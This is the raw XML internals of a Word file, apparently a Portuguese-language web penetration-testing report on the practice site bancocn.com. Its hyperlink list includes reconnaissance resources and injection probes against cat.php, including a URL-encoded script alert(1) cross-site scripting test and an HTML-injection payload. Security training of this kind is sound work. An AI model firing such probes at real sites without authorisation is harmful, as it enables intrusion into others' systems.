    <w:rsid w:val="00AD0605"/>
    <w:rsid w:val="00AD3CA1"/>
    <w:rsid w:val="00AD438E"/>
    <w:rsid w:val="00AD7E78"/>
    <w:rsid w:val="00AE015C"/>
    <w:rsid w:val="00AE4B01"/>
    <w:rsid w:val="00AE78F1"/>
    <w:rsid w:val="00AF0B98"/>
    <w:rsid w:val="00AF1C14"/>
    <w:rsid w:val="00AF439D"/>
    <w:rsid w:val="00AF5760"/>
    <w:rsid w:val="00B007BE"/>
    <w:rsid w:val="00B12218"/>
    <w:rsid w:val="00B12A3E"/>
    <w:rsid w:val="00B224E1"/>
    <w:rsid w:val="00B359E1"/>
    <w:rsid w:val="00B82479"/>
    <w:rsid w:val="00B93624"/>
    <w:rsid w:val="00B93831"/>
    <w:rsid w:val="00BA795B"/>
    <w:rsid w:val="00BB0D0B"/>
    <w:rsid w:val="00BB6F5E"/>
    <w:rsid w:val="00BC251B"/>
    <w:rsid w:val="00BE097E"/>
    <w:rsid w:val="00BE1DA1"/>
    <w:rsid w:val="00BF5FA7"/>
    <w:rsid w:val="00BF74C5"/>
    <w:rsid w:val="00C040C7"/>
    <w:rsid w:val="00C047EF"/>
    <w:rsid w:val="00C13E29"/>
    <w:rsid w:val="00C15BB4"/>
    <w:rsid w:val="00C21612"/>
    <w:rsid w:val="00C35C37"/>
    <w:rsid w:val="00C409BC"/>
    <w:rsid w:val="00C428D2"/>
    <w:rsid w:val="00C44F89"/>
    <w:rsid w:val="00C450F9"/>
    <w:rsid w:val="00C46B05"/>
    <w:rsid w:val="00C46EF2"/>
    <w:rsid w:val="00C475CD"/>
    <w:rsid w:val="00C56E7F"/>
    <w:rsid w:val="00C63893"/>
    <w:rsid w:val="00C80A28"/>
    <w:rsid w:val="00CC12BF"/>
    <w:rsid w:val="00CE62D1"/>
    <w:rsid w:val="00CF7009"/>
    <w:rsid w:val="00D046C8"/>
    <w:rsid w:val="00D04B2C"/>
    <w:rsid w:val="00D05CA4"/>
    <w:rsid w:val="00D06C1A"/>
    <w:rsid w:val="00D210A7"/>
    <w:rsid w:val="00D26A8F"/>
    <w:rsid w:val="00D40ED9"/>
    <w:rsid w:val="00D42A43"/>
    <w:rsid w:val="00D45E6B"/>
    <w:rsid w:val="00D46677"/>
    <w:rsid w:val="00D46A35"/>
    <w:rsid w:val="00D56441"/>
    <w:rsid w:val="00D63225"/>
    <w:rsid w:val="00D7571D"/>
    <w:rsid w:val="00D83CEF"/>
    <w:rsid w:val="00D92C8C"/>
    <w:rsid w:val="00D93ADD"/>
    <w:rsid w:val="00D95197"/>
    <w:rsid w:val="00DB3862"/>
    <w:rsid w:val="00DB3C41"/>
    <w:rsid w:val="00DC4F22"/>
    <w:rsid w:val="00DD16A3"/>
    <w:rsid w:val="00DD17E9"/>
    <w:rsid w:val="00DD5858"/>
    <w:rsid w:val="00DD7497"/>
    <w:rsid w:val="00DE515E"/>
    <w:rsid w:val="00DF2CEC"/>
    <w:rsid w:val="00DF5AAB"/>
    <w:rsid w:val="00E2687F"/>
    <w:rsid w:val="00E469E5"/>
    <w:rsid w:val="00E528FC"/>
    <w:rsid w:val="00E53ABD"/>
    <w:rsid w:val="00E61808"/>
    <w:rsid w:val="00E61922"/>
    <w:rsid w:val="00E957A6"/>
    <w:rsid w:val="00E962E5"/>
    <w:rsid w:val="00EA510B"/>
    <w:rsid w:val="00EA5136"/>
    <w:rsid w:val="00EA5C18"/>
    <w:rsid w:val="00EB4CC8"/>
    <w:rsid w:val="00ED1F39"/>
    <w:rsid w:val="00ED2406"/>
    <w:rsid w:val="00EE0B0C"/>
    <w:rsid w:val="00EE1B78"/>
    <w:rsid w:val="00F0252A"/>
    <w:rsid w:val="00F067BA"/>
    <w:rsid w:val="00F06E5F"/>
    <w:rsid w:val="00F127AB"/>
    <w:rsid w:val="00F16C3B"/>
    <w:rsid w:val="00F2234A"/>
    <w:rsid w:val="00F32982"/>
    <w:rsid w:val="00F33580"/>
    <w:rsid w:val="00F63671"/>
    <w:rsid w:val="00F640B0"/>
    <w:rsid w:val="00F64E78"/>
    <w:rsid w:val="00F65F64"/>
    <w:rsid w:val="00F80627"/>
    <w:rsid w:val="00F92120"/>
    <w:rsid w:val="00F92C3E"/>
    <w:rsid w:val="00F93E19"/>
    <w:rsid w:val="00FA1054"/>
    <w:rsid w:val="00FA4F9F"/>
    <w:rsid w:val="00FB07A4"/>
    <w:rsid w:val="00FD0064"/>
    <w:rsid w:val="00FE2351"/>
    <w:rsid w:val="00FF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5303"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{62C4F6CD-3B82-402F-B684-498D4721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left="-1134" w:right="-1134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15C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004A37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0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E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3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35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502C3F"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0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02C3F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sumrio2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00502C3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502C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322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63225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E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7A6108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F16C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6C3B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Rodap">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="RodapChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F16C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6C3B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PargrafodaLista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003B705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19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227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5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3663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9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28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161830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454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11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0665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586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ancocn.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bancocn.com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://www.bancocn.com/cat.php?id=2&#8217;%3ch1%3eOla%3c/h1" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bancocn.com" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=1" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=41" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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bancocn.com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registro.br" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitytrails.com/blog/google-hacking-techniques" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bancocn.com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4.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=1" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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://bancocn.com/robots.tx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ancocn.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com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://bancocn.com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://bancocn.com/cat.php?id=41" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=41" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists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://www.bancocn.com" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=1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2.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bancocn.com/cat.php?id=2&#8217;%3cscript%3ealert(1)%3c/script" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=4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bancocn.com" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/google-hacking-database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://www.bancocn.com/cat.php?id=2" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancocn.com/cat.php?id=41" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://who.is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://bancocn.com/cat.php?id=1" TargetMode="External"/><Relationship Id="rId5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53D1E-B807-4F53-84BC-61BC94C3F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2681</TotalTime>
  <Pages>23</Pages>
  <Words>6052</Words>
  <Characters>32685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Carmona</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Igor Carmona</cp:lastModifiedBy>
  <cp:revision>322</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-21T17:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-31T00:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>